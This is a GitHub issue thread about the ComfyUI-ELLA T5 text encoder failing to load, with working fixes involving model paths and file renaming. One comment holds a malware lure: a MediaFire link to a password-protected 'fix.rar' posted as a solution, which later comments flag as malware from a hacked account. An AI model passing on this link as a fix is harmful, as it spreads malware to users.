### ISSUE TITLE
Unable to load Flan-T5 Text Encoder

### ISSUE THREAD

**Issue by Kasr40k** [TencentQQGYLab/ComfyUI-ELLA#62]
![Example](https://github.com/user-attachments/assets/d9062362-892a-43f7-8f09-6228df6e800c)

Despite following the given instructions for installation of the ELLA implementation for ComfyUI, the T5 Text Encoder is unable to be loaded. The model is in the correct location and the text encoder loader simply displays "undefined" in the name field.

**Comment by YoungAgile** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Kasr40k** [comment]
The post with the link to the malware has been removed.

**Comment by YoungAgile** [comment]
> I just read an alert from the ComfyUI Manager. Do not download the file the user **YoungAgile** just linked to! It's malware.

Sorry, my account was hacked just now. Please do not click on the link

**Comment by Kasr40k** [comment]
* I finally got the text encoder to load. It seems that because I'm referencing an auto1111 installation, I had to put the ella_encoder and it's associated files in my auto1111 models folder, and then also reference the ella_encoder folder in the extra_model_paths.yaml file

**Comment by MLTQ** [comment]
I'm using comfyui and running into the same problem- the ella model in `/models/ella/` is found just find, but the t5 loader can never find `/models/ella_encoder/`.

**Comment by MLTQ** [comment]
For anyone in the future- huggingface downloaded the files with a prefix that was preventing the `config.json` from being discovered by the directory crawler. renaming it fixed the issue.
